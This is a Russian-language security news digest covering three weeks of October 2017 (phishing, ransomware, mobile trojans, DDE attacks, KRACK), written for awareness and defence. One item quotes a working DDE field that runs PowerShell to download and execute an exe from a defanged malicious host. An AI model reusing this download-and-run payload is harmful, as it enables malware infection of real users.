Ctrl + ↑ Позднее

Представляем новости об актуальных технологиях фишинга и других атаках на человека c 20 по 26 октября 2017 года.


Андрей Жаркевич
редактор, ИТ-руководитель

Сайты, мессенджеры и почта

Целью фишинговой атаки стали специалисты по безопасности, которых могли заинтересовать новости CyCon — американской конференции по информационной безопасности:

Злоумышленники сочли, что анонс мероприятия, ориентированного на специалистов по информационной безопасности, станет хорошей наживкой, скопировали документы с официального сайта CyCon и внедрили в них малварь Seduploader с вредоносными VBA-скриптами.

Seduploader может делать скриншоты зараженного устройства, собирать и передавать на управляющий сервер информацию о системе, а также загружать файлы и выполнять код.

Microsoft Outlook оказался подвержен атаке через протокол Dynamic Data Exchange. Чтобы атаковать пользователя, оказалось достаточно отправить ему письмо в формате RTF —
вредоносный код помещается непосредственно в теле письма.

Чтобы избежать заражения, достаточно нажать «Нет» в следующих диалоговых окнах:

или включить принудительный просмотр всех сообщений в формате «только текст».

Вредоносное ПО

Крупные российские СМИ, а также ряд украинских госучреждений подверглись атакам шифровальщика Bad Rabbit. В числе пострадавших оказались «Интерфакс», «Фонтанка», а также Международный аэропорт «Одесса», Киевский метрополитен и украинское Министерство инфраструктуры.

Основным вектором распространения стали взломанные сайты СМИ, на которых посетителям предлагали скачать и запустить фальшивое обновление Flash Player:

Как минимум в одном из случаев для компрометации легитимного сайта был взломан компьютер разработчика сайта.

После заражения вредонос задействовал утилиту Mimikatz для извлечения паролей из LSASS, а также имел список наиболее распространенных логинов и паролей, чтобы через SMB и WebDAV распространиться на другие серверы и рабочие станции, находящиеся в одной сети с зараженным устройством.

Пользователи популярного macOS-плеера Elmedia Player оказались под угрозой заражения вредоносом Proton в результате взлома сайта Eltima — разработчика приложения.

Proton позволяет злоумышленнику удалённо похищать данные с зараженного устройства, в том числе информацию об операционной системе, пароли в браузере, файлы cookie, историю просмотров, закрытые SSH-ключи, данные о криптовалютных кошельках, конфигурации VPN, данные GnuPG и пр. Кроме того, Proton может использоваться для загрузки дополнительного вредоносного ПО.

Криптовалюты

Злоумышленники взломали сервис CoinHive, который предоставляет владельцам сайтов возможноcть встроить скрипты для майнинга криптовалюты прямо в код ресурса. В результате криптовалюту зарабатывали не владельцы сайтов, а мошенники.

Для взлома использовались похищенные в 2014 году учётные данные CoinHive на сервисе Cloudflare, которые так и не удосужились поменять. Атака продолжалась около шести часов, но сколько за это время успели «заработать» злоумышленники, не сообщается.

Новая фишинговая кампания использует поддельные письма от администрации сервиса Myetherwallet.com для хищения криптовалюты из кошельков пользователей.

  1. В письмах говорится, что ресурс готовится к хардфорку, в связи с чем необходимо перейти по приведенной в письме ссылке, разблокировать аккаунт и проверить баланс.
  2. Ссылка из письма приводит жертву на сайт, идентичный настоящему Myetherwallet. Чтобы усилить сходство, преступники зарегистрировали домен с юникодным символом «ț» в адресе сайта — вместо настоящей буквы «t».
  3. Если жертва вводит свои учетные данные на фальшивом сайте, преступники немедленно подключаются к настоящему кошельку пострадавшего и выводят все деньги.

Злоумышленникам повезло: только на одном из кошельков хранилось 42,5 ETH — около $12 500. Общий заработок преступников составил 52,56 ETH ($15 875) за два часа.

Мобильная безопасность

Новый Android-троян LokiBot похищает деньги с банковских счетов пользователя, а при попытке отзыва привилегий администратора превращается в вымогательское ПО и шифрует смартфон:

По аналогии с другими мобильными банковскими троянами LokiBot отображает поддельные окна поверх окон легитимных приложений. В сфере интересов трояна как банковские приложения, так и Skype, Outlook или WhatsApp.

LokiBot содержит ряд необычных функций:

  1. Установка SOCKS5-прокси для перенаправления трафика.
  2. Автоматические ответы на SMS и SMS-рассылки по всему списку контактов жертвы. Эта функция используется для рассылки вредоносного спама и заражения других пользователей.
  3. Вывод фальшивых сообщений якобы от настоящих приложений. Таким образом вредонос может сообщить жертве о поступлении денег на счёт и подтолкнуть её запустить приложение банка.

Мобильные приложения для онлайн-знакомств позволяют не только перехватить и украсть личную информацию, но и раскрыть личность пользователя сервиса знакомств, что в перспективе может создать жертве массу проблем — от рассылки сообщений от ее имени в социальной сети до шантажа.

Например, в Tinder, Happn и Bumble пользователь может указать сведения о работе и образовании. Используя эту информацию, можно найти страницы пользователей в других социальных сетях, таких как Facebook и LinkedIn, их имена и фамилии:

О компании «Антифишинг»

Мы помогаем обучить сотрудников и контролировать их навыки с помощью учебных фишинговых атак. Используем реалистичные сценарии и самые актуальные примеры мошенничества.

Чтобы проверить своих сотрудников, заполните форму на сайте или напишите нам: ask@antiphish.ru

Оставайтесь в безопасности

Подпишитесь на рассылку, чтобы знать об актуальных технологиях фишинга и других атаках на человека.

Представляем новости об актуальных технологиях фишинга и других атаках на человека c 13 по 19 октября 2017 года.


Андрей Жаркевич
редактор, ИТ-руководитель

Сайты, мессенджеры и почта

Новая разновидность фишинговых атак с использованием документов MS Office использует для загрузки и запуска вредоносного кода технологию Microsoft DDE.

DDE позволяет вставить в документ поле, данные в которое загружаются из других приложений. При загрузке такого документа пользователь увидит предупреждение с предложением загрузить данные:

Если пользователь согласится обновить данные, будет сформирован и запущен на выполнение вредоносный код:

"DdE" c:\\Windows\\System32\\cmd.exe " /k powershell.exe (New-Object System.Net.
WebClient).DownloadFile('http://frontiertherapycenter[.]com/16.exe',
'%TEMP%\\tvs.exe');Start-Process '%TEMP%\\tvs.exe'"</w:instrText>

Основная проблема заключается в том, что пользователи, которые часто работают со связанными документами, не обращают внимания на эти сообщения. Предупреждения выглядят настолько привычными, что их подтверждают, не читая.

Злоумышленники используют функцию «Доверенные контакты», чтобы обманом получить код для смены пароля пользователя Facebook:

  1. Жертва получает письмо от друга, с которым редко общается.
  2. «Друг» сообщает, что назначил жертву доверенным контактом и просит прислать код для разблокировки учетной записи.
  3. На почту приходит некий код. На самом деле он предназначен для смены собственного пароля жертвы: чтобы прислать его, злоумышленники вводят логин жертвы и нажимают «Забыли пароль?».
  4. Получив от жертвы код, преступники взламывают аккаунт и рассылают аналогичные сообщения друзьям обманутого пользователя.

Преступники массово рассылают фишинговые уведомления в Viber от имени ВТБ 24 и Сбербанка. В уведомлении сообщается, что картой пользователя оплатили покупку и платеж будет проведен в течение суток. Если пользователь не совершал покупки, предлагается позвонить «в службу безопасности»:

Когда жертва звонит по указанному номеру, мошенники требуют предоставить данные платежной карты для «идентификации» клиента.

Умные устройства

Некоторые модели «умных» детских часов содержат уязвимости, с помощью которых злоумышленники могут отслеживать и подслушивать пользователей устройств или даже общаться с ними:

Часы Gator и GPS for Kids передают и сохраняют данные без какого-либо шифрования. Таким образом злоумышленники без особого труда могут отследить или изменить данные о местоположении ребенка.

Радиоключи некоторых моделей Subaru содержат уязвимость, которую можно использовать для угона автомобиля:

Уязвимость позволяет перехватить код, который передается при нажатии кнопки брелока, и использовать его в устройстве, дублирующем все возможности ключа.

Для перехвата кода достаточно компьютера Raspberry PiB+, USB-адаптера WiFi, ТВ-ресивера, антенны диапазона 433 МГц и переходника с MCX на MSA. Стоимость каждого из этих устройств варьируется от одного до 25 долларов, а купить их можно в любом магазине электроники.

Получив один-единственный сигнал с брелока при нажатии любой кнопки, преступник может использовать полученные данные, чтобы вычислить следующий код, а потом открыть машину, багажник или отключить сигнализацию.

Жёсткий диск компьютера можно использовать для организации скрытой прослушки помещения без использования микрофона.

Атака основана на предположении, что винчестер выполняет различные операции за различное время в зависимости от поданных входных данных, роль которых играют колебания считывающей головки и пластины HDD, коррелирующие с вибрациями среды, то есть со звуком.

Измеряя время вычислений и проводя статистический анализ данных, можно измерить колебания головки/пластины и, следовательно, вибрации среды. Чем больше задержка в считывании данных — тем сильнее колебания HDD и, значит, тем громче звук.

Демонстрация звукозаписи с помощью HDD, работа утилиты Kscope:

Криптовалюты

Криптомайнер WaterMiner распространяли вместе с модом для игры GTAV:

После запуска вредонос связывался через TCP-порт 45560 с майнинг-пулом, который объединяет вычислительные ресурсы зараженных компьютеров и использует их для майнинга криптовалюты Monero.

Общедоступный код WaterMiner был доработан: майнер автоматически отключался, как только пользователь открывал Диспетчер задач Windows или любое другое приложение, позволяющее понять, какой именно процесс тормозит работу.

Мобильная безопасность

Зловред DoubleLocker распространяется под видом обновления Adobe Flash Player и использует уязвимость Android Accessibility Service, чтобы изменить PIN-код на зараженном аппарате и зашифровать его содержимое.

Функция Accessibility Service позволяет приложениям эмулировать прикосновения по элементам управления, упрощая использование устройства людям со слабым зрением и прочими ограничениями.

  1. После запуска зловред от лица Google Play Service запрашивает у пользователя разрешение на управление.
  2. Если пользователь предоставляет DoubleLocker требуемые разрешения, вирус дает себе статус администратора и привязывается к кнопке «Домой».
  3. Каждое ее нажатие запускает шифровальщик, который раз за разом блокирует устройство.

Видео с демонстрацией работы DoubleLocker

За расшифровку злоумышленники требуют в течение суток заплатить 0,0130 BTC. Это около $72 по курсу на 16 октября. Вернуть контроль над устройством с потерей данных можно путём сброса.

В протоколе WPA2 обнаружены слабости, которые позволяют обойти защиту, прослушивать и подменять Wi-Fi-трафик, передаваемый между точкой доступа и клиентом. Комплекс уязвимостей получил название KRACK (аббревиатура от Key Reinstallation Attacks).

KRACK позволяет осуществить атаку типа man-in-the-middle и принудить участников сети выполнить реинсталляцию ключей шифрования, которые защищают трафик WPA2.

Метод KRACK универсален и работает против любых устройств, подключенных к Wi-Fi сети. В опасности все пользователи Android, Linux, iOS, macOS, Windows, OpenBSD, а также многочисленные IoT-устройства.

Видео с демонстрацией атаки:

Антифишинг рекомендует:

  1. Установить последние обновления на свои устройства.
  2. Обновить прошивки на своих точках доступа.
  3. Считать любые Wi-Fi сети незащищенными: не расчитывать на встроенное шифрование и не попадаться на возможные мошенничества в беспроводных сетях.

Вредоносное ПО

Вредоносное ПО Sockbot маскируется под скины для Minecraft Pocket Edition:

Приложения действительно меняют внешний вид персонажа игры, но в фоновом режиме подключаются к управляющему серверу, получают список рекламных объявлений и связанных с ними метаданных. Затем приложение подключается к рекламному серверу через SOCKS-прокси и отправляет рекламные запросы.

Новое вредоносное расширение Chrome загружает скрипт Coinhive для майнинга криптовалюты и использует Gmail-аккаунт жертвы для регистрации доменов:

  1. Расширение по имени Ldi продвигается на взломанных сайтах с помощью навязчивого показа предупреждений JavaScript с предложением установить Chrome-плагин.
  2. Если закрыть эти предупреждения, в браузере автоматически откроется страница загрузки Ldi на Chrome Web Store.
  3. После установки Ldi загружает майнер Monero:

и начинает процесс регистрации доменов на Freenome.com:

О компании «Антифишинг»

Мы помогаем обучить сотрудников и контролировать их навыки с помощью учебных фишинговых атак. Используем реалистичные сценарии и самые актуальные примеры мошенничества.

Чтобы проверить своих сотрудников, заполните форму на сайте или напишите нам: ask@antiphish.ru

Оставайтесь в безопасности

Подпишитесь на рассылку, чтобы знать об актуальных технологиях фишинга и других атаках на человека.

Представляем новости об актуальных технологиях фишинга и других атаках на человека c 6 по 12 октября 2017 года.


Сергей Волдохин
sv@antiphish.ru


Андрей Жаркевич
редактор, ИТ-руководитель

Мобильная безопасность

Операционная система iOS имеет особенность, которая позволяет разработчикам приложений создавать диалоговые окна, неотличимые от  системных запросов паролей от iCloud, iTunes или GameCenter:


Мошенники могут не знать email-адрес жертвы, поскольку настоящие запросы могут выглядеть вот так:

Чтобы защититься от кражи пароля, просто нажмите кнопку «Home»:

  • если диалоговое окно закроется вместе с программой, значит вы стали жертвой фишинговой атаки;
  • если диалог останется на экране — всё в порядке, это системный запрос.

Не вводите ваши данные в диалог, вместо этого откройте настройки вручную. Помните, что даже если вы нажмете кнопку «Отмена» после ввода пароля, мошенническое приложение всё равно получит введенные данные.

Сайты, мессенджеры и почта

Злоумышленники использовали сайт Pornhub для раздачи троянца-кликера Kovter через вредоносную рекламу.

  • Атака начинается с редиректора, размещенного на advertizingms[.]com, который перенаправляет посетителя на сайт в KeyCDN — крупной сети доставки контента.
  • Здесь регистрируются тип браузера и географическое местоположение потенциальной жертвы.
  • Затем вредоносная реклама «доставляет» страницу, содержащую сильно обфусцированный вредоносный JS-файл:

Мошенники используют элементы социальной инженерии, чтобы склонить пользователей к установке фальшивых обновлений, которые объявляются при заходе на страницу с вредоносной рекламой. Если пользователь запустит фальшивый файл «обновления», то даже не заметит перемены в системе, а зловред тем временем запустит скрытый процесс браузера и начнет кликать по рекламным объявлениям, умножая доходы злоумышленников.

Пользователи компьютеров Apple могут стать жертвами фишинговой атаки, которая распространяется под видом официального уведомления от службы технической поддержки Apple по электронной почте и через сайты:

Пользователя пугают, что его компьютер содержит вирусы или критические уязвимости и предлагают запустить процедуру сканирования компьютера.

Если пользователь соглашается, на его компьютер загружается мошенническое «обновление» для Adobe Flash Player.

На момент выпуска ссылка на загрузку вредоноса уже недоступна.

WhatsApp содержит уязвимость, которая позволяет шпионить за пользователями. Для ее эксплуатации достаточно обладать минимальными техническими навыками, а принять какие-либо меры для защиты от слежки невозможно.

Проблема связана с функциями, отображающими online-статус пользователя и время, когда он в последний раз заходил в сеть. Отключить эту функцию невозможно.

Если собрать и проанализировать данные о входе в Сеть за определенный период, можно многое узнать о пользователя, в частности, когда он ложится спать, сколько спит и когда просыпается.

Сопоставив данные разных контактов, можно выявить закономерности, позволяющие определить, кто, с кем, когда и как долго общался.

В ходе фишинговой кампании FreeMilk хакеры перехватывают электронную переписку для последующего распространения вредоносного ПО в корпоративных сетях. При этом фишинговые сообщения выполнены настолько профессионально, что у жертв не возникает сомнений в подлинности писем.

  1. На основании перехваченной переписки целевого объекта жертву пытаются заставить установить вредоносное ПО из якобы доверенного источника.
  2. Для заражения используется уязвимость CVE-2017-0199 в Microsoft Office, позволяющая удаленно выполнить код и получить полный контроль над зараженной системой путем хищения учетных данных.
  3. В случае успешной атаки на целевую систему устанавливается вредонос PoohMilk, который загружает и запускает шпионское ПО Freenki.
  4. Freenki собирает на зараженном компьютере информацию об имени пользователя и компьютера, MAC-адрес и данные о запущенных процессах, а также может загружать дополнительное вредоносное ПО.
  5. Собранные сведения отправляются на управляющий сервер злоумышленников.

Пользователи Outlook, отправлявшие зашифрованные письма с помощью S/MIME, оказались жертвами программной ошибки, из-за которой к зашифрованным письмам прилагались их незашифрованные копии. В результате атакующий, перехватывающий трафик жертвы, мог с легкостью прочесть якобы защищенные шифрованием послания.

Открытый текст письма добавлялся только к отправленным письмам, которые были

  • зашифрованы при помощи S/MIME;
  • написаны в формате простого текста;
  • отправлены через Outlook в связке с SMTP, то есть послания были открыты всей цепочке серверов на пути к получателю.

Умные устройства

Умная колонка Google Home Mini может самопроизвольно включаться, записывать происходящее вокруг и отправлять запись на серверы Google.

Google Home Mini имеет сенсорную поверхность, и для того, чтобы дать команду устройству, пользователь может либо сказать «ОК Google», либо назначить специальное кодовое слово, либо нажать на устройство и удерживать нажатие в течение какого-то времени.

Некоторые устройства имеют дефект сенсорной панели, из-за которого регистрируют касания, которых на самом деле не было.

Демонстрация самопроизвольного включения колонки:

Вредоносное ПО

Из Chrome Web Store удалили расширение, которое выдавало себя за популярный блокировщик рекламы AdBlock Plus. Подделка не просто не блокировала рекламу, но открывала в браузере новые вкладки с рекламой. До удаления расширение успели установить более 37 000 человек.

Причина появления вредоноса в каталоге в том, что Google автоматизировала процесс загрузки расширений и позволяет разработчикам загружать расширения с такими же именами, как у других продуктов:

Майнинговый скрипт для добычи криптовалюты Monero от сервиса Coinhive вернулся на страницы популярного торрент-трекера The Pirate Bay. В результате, после захода на страницу трекера загрузка процессора на компьютере посетителя возрастает до 100%.

В погоне за легким заработком операторы сайтов и злоумышленники не дают возможности отключить майнер. Из-за этого многие ИБ-эксперты и компании рассматривают такие скрипты как вредоносное ПО, а компания Cloudflare уже перешла к активным действиям и стала блокировать такие ресурсы.

О компании «Антифишинг»

Мы помогаем обучить сотрудников и контролировать их навыки с помощью учебных фишинговых атак. Используем реалистичные сценарии и самые актуальные примеры мошенничества.

Чтобы проверить своих сотрудников, заполните форму на сайте или напишите нам: ask@antiphish.ru

Оставайтесь в безопасности

Подпишитесь на рассылку, чтобы знать об актуальных технологиях фишинга и других атаках на человека.

Ctrl + ↓ Ранее